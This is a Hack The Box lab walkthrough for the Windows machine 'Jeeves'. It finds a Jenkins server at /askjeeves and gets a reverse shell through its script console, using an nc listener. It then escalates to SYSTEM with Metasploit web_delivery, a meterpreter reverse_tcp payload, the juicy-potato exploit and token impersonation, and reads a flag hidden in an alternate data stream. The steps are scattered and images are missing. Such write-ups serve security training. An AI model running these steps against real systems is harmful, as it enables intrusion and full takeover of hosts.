Hackthebox - Jeeves
Last updated
Last updated
Windows
Gobuster does not give much
If we look at the system info we get a user name: kohsuke
Let's set a listener rlwrap nc -lvp 8044
It works we are jeeves\kohsuke
We can grab our user flag type C:\Users\kohsuke\Desktop\user.txt
We can use windows exploit suggester with sysinfo
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -update
(to get the latest db file)
python windows-exploit-suggester.py --database 2022-04-08-mssb.xls -i ../sysinfo.txt
We have a lot of options including potatoes
Launch msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
for PSH
set payload windows/meterpreter/reverse_tcp
set lhost tun0
Let's interact with it sessions -i 1
Using ctrl+z lets now background the shell
use exploit/windows/local/ms16_075_reflection_juicy
show options
set session 1
set LHOST tun0
load incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
if we dir /R
we can see our flag
more < hm.txt:root.txt:$DATA
we can do this to print it
Here are a few methods on how to print alternate data streams
We have this page
It seems gives stack trace when trying to search for something
But it is just an image, indeed the action of the form will just go to error.html
Here is what we see on the browser for this port:
Gosbuster does not always work for the first time we need to use different wordlists, I tried a few before getting to the askjeeves result. The one that gave the result is directory-list-2.3-big.txt
If we navigate to /askjeeves we have a jenkins server
If we go to jenkins cli we can use a jar and execute command from it
Script console also seems interesting, let's try to get a reverse shell this way We can find one online here:
Here are our privileges
We have the SeImpersonatePrivilege
enabled
set SRVHOST tun0
Now we just need to execute this in our target
And we get a meterpreter session
To get the build in potato options lets use metasploit exploit suggester run post/multi/recon/local_exploit_suggester
run
And it worked
Event though we got authority system the root flag is not here instead we have this